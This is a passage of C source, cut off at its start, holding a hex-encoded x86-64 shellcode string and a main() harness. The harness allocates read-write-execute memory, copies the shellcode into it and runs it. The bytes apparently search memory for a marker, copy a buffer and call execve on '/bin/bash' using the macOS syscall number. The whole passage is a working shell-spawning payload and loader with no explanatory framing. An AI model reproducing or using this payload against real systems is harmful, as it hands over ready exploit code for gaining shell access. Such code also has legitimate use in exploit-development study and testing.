"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x11\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x7b\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x84\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\xa4\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\xa5\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\xff";
int main() {
size_t shellcode_size = sizeof(shellcode);
printf("[+] Shellcode Length: %lu Bytes\n", shellcode_size);
void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (rwx_memory == MAP_FAILED) {
printf("[!] Failed to allocate RWX memory\n");
perror("mmap");
exit(-1);
}
printf("[+] Copying shellcode from variable at %p to allocated RWX memory at %p\n",shellcode,rwx_memory);
memcpy(rwx_memory, shellcode, sizeof(shellcode));
execute_shellcode = rwx_memory;
printf("[+] Executing shellcode at %p\n",rwx_memory);
execute_shellcode();
return 0;
}